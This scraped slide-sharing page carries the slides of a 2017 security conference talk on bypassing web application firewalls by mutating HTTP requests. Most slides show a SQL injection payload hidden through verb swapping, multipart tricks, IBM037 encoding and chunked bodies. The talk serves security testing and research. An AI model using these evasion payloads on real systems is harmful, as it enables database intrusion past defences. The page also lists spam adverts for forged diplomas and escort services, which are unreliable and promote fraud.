DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 

Dernier

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationMarko4394
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 

Dernier (17)

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentation
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 

A Forgotten HTTP Invisibility Cloak

  • 1. A Forgotten HTTP Invisibility Cloak BSides Manchester 2017 – by Soroush Dalili
  • 2. About Me • A web application security guy • Breaker > Builder • Love to bypass stuff with a single character  • e.g. Remember IIS6 file.asp;.jpg bypass? • Working at NCC Group • Bug bounty hunter where possible! • Twitter: @irsdl
  • 3. This Talk! • Messing with HTTP… (version < 2) • HTTP Request Smuggling! • Not all new, but forgotten • Lots of heat • We are burning our bypass techniques! • Brain teasers alert! o_x • Boring HTTP requests alert! x_x
  • 4.
  • 5. Game Changers! • Web Servers (IIS, Apache, …) • Technologies (ASPX, ASP, JSP, …) • Gateways and Proxies • Also important: • Version • Configuration • The same with WAF/IDS
  • 6. Our Targeted Webservers! • Nginx,uWSGI-Django-Python2 & Python3 • Apache-TOMCAT8-JVM1.8-JSP & TOMCAT7-JVM1.6 • Apache-PHP5 (mod_php & FastCGI) • PHP7.1 on IIS8-FastCGI • ASP Classic on IIS6, 7.5, 8, 10 • ASP.NET on IIS6, 7.5, 8, 10
  • 7. What The HTTP? • Textual & simple (before version 2) • Apart from version 2 • v1.1 (rfc2068 -> rfc2616 -> rfc7230-7235) • v1.0 (rfc1945) • v0.9 -> not expected to be supported but it still does
  • 9. A Simple HTTP Request POST /path/sample.aspx?input0=QueryValue HTTP/1.1 HOST: victim.com Cookie: input2=CookieValue Content-Type: application/x-www-form-urlencoded Content-Length: 18 input1=PostValue
  • 10. Request Mutation • Request A != Request B • Response A == Response B • Perhaps to solve one of these problems: • Browsing your favourite betting site while at work! • Looking at restricted areas of a site! • Fingerprinting the Servers • Cache poisoning, Response Splitting, Socket Buffer Poisoning (e.g. Hiding Wookiees in HTTP – Defcon24) • Bypassing a WAF/IDS during security testing!
  • 11. WAF in Security Testing!
  • 12. Common Mutations • Well documented in RFCs… • e.g. Line folding in headers • Common behaviours • /foo/../ in a normal path • URL-encoding • HTML-encoding in XML • etc. etc. • Normally detected by most of the WAFs
  • 13. Strange Mutations • Needs researching… repurposing! • Some examples to start with: • &==; – Python Django between parameters! • FooBar==POST verb – Apache with PHP • <%I%M%u011e>==<IMG> – IIS ASP Classic • ;/path1;foo/path2;bar/;==/path1/path2/ – Apache Tomcat • Sometimes even against RFC:
  • 14.
  • 15. IIS 10 ASPX (v4) Test Case – Request A POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 16. HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP)
  • 17. Original Request POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 18. HTTP Verb Replacement GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 19. Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
  • 20. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 21. Changing Body Type GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
  • 22. Removing Unnecessary Parts! • What if we remove some parts of the body? • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
  • 23. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
  • 24. Removing Unnecessary Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
  • 25. Adding Useless Parts! • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • Spacing can be useful too • CRLF after “Content-Disposition:” and before the space • PHP  ASPX 
  • 26. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
  • 27. Adding Useless Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 113 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
  • 28. Changing Request Encoding! • “Content-Type” again… but charset now! • Normally used for responses but • Also works on the requests: • Nginx,uWSGI-Django-Python 2,3 • Apache-TOMCAT 7/8-JVM1.6/1.8-JSP • IIS (ASPX) • Examples: • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data;boundary=blah;charset=ibm037 • application/x-www-form-urlencoded;charset=ibm037
  • 29. Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
  • 30. Changing Request Encoding! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
  • 31. Encoding Example: Using Python import urllib s = 'Content-Disposition: name="input1"; filename ="test.jpg"' print urllib.quote_plus(s.encode("IBM037")) > %C3%96%95%A3%85%95%A3%60%C4%89%A2%97%96% A2%89%A3%89%96%95z%40%95%81%94%85%7E%7F%89 %95%97%A4%A3%F1%7F%5E%40%86%89%93%85%95%8 1%94%85%40%40%40%7E%7F%A3%85%A2%A3K%91%97 %87%7F
  • 32. Chunking The Body! • We can go further & further • Transfer-Encoding: chunked • Size in Hex before each part! • Comments after size with a “;” as delimiter • Ends with 0 and a CRLF
  • 33. Previous Request GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
  • 34. Chunked! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked A --1 --1 63 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0
  • 35. More Useless Data – Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked 0000A ;--irsdl --1 --1 63;--1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0;--1--
  • 36. Remember the Original Request? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
  • 38. HTTP Pipelining • HTTP/1.1 & 1.0 • HTTP 1.0 needs: “Connection: keep-alive” • “Connection: close” stops it (default in 1.0) • Hop by Hop • Still FIFO • 1 HTTP request can contain multiple requests • Content-Length is important if not chunked!
  • 39. HTTP Pipelining Example POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee POST /foobar.aspx?input0=2 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 3 A=B …
  • 40. HTTP Pipelining & HTTP 0.9 POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee GET https://victim.com/anotherpage.aspx?input=value! • Bypassing default settings of a famous WAF when PATH is forbidden • What about Apache Tomcat?
  • 41. Pro Tips! • Be smart, there are more techniques, more confusions • But don’t be greedy, perhaps try them separately • Different technologies are different • External WAFs (e.g. cloud based) are easier to bypass • A proxy server can ruin your fun • but can also make it more fun!
  • 42. http://HTTP.NINJA/ • Work in progress… • Host test files, test cases, results • More tools to come • Needs community participation in near future